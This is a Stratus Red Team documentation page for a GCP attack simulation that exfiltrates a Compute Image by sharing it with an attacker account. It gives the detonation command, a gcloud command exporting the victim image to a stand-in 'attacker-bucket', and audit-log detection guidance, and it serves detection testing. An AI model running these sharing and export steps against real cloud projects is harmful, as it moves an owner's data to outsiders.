Skip to content

Exfiltrate Compute Image by sharing it

slow idempotent

Platform: GCP


  • Exfiltration


Exfiltrates a Compute Image by sharing with a fictitious attacker account. The attacker could then create a snapshot of the image in their GCP project.


  • Create a Compute Image


  • Set the IAM policy of the image so that the attacker account has permissions to read the image in their own project


Since the target e-mail must exist for this attack simulation to work, Stratus Red Team grants the role to by default. This is a real Google account, owned by Stratus Red Team maintainers and that is not used for any other purpose than this attack simulation. However, you can override this behavior by setting the environment variable STRATUS_RED_TEAM_ATTACKER_EMAIL, for instance:

stratus detonate gcp.exfiltration.share-compute-image


Detonate with Stratus Red Team
stratus detonate gcp.exfiltration.share-compute-image


You can detect when someone changes the IAM policy of a Compute Image, using the GCP Admin Activity audit logs event v1.compute.images.setIamPolicy. Here's a sample event, shortened for clarity:

  "protoPayload": {
    "@type": "",
    "authenticationInfo": {
      "principalEmail": "user-sharing-the-image@domain.tld",
      "principalSubject": "user:user-sharing-the-image@domain.tld"
    "requestMetadata": {
      "callerIp": "",
      "callerSuppliedUserAgent": "google-cloud-sdk gcloud/..."
    "resourceName": "projects/victim-project/global/images/stratus-red-team-victim-image",
    "request": {
      "policy": {
        "version": "3",
        "bindings": [
            "role": "roles/owner",
            "members": [
      "@type": ""

After the attacker has permissions on the Compute Image, they can export it in their own GCP Storage using:

    gcloud compute images export \
    --destination-uri gs://attacker-bucket/victim-image \
    --image stratus-red-team-victim-image

Based on this event, detection strategies may include:

  • Alerting when the IAM policy of a Compute Image is changed, especially if such a sharing mechanism is not part of your normal operations. Sample GCP Logs Explorer query: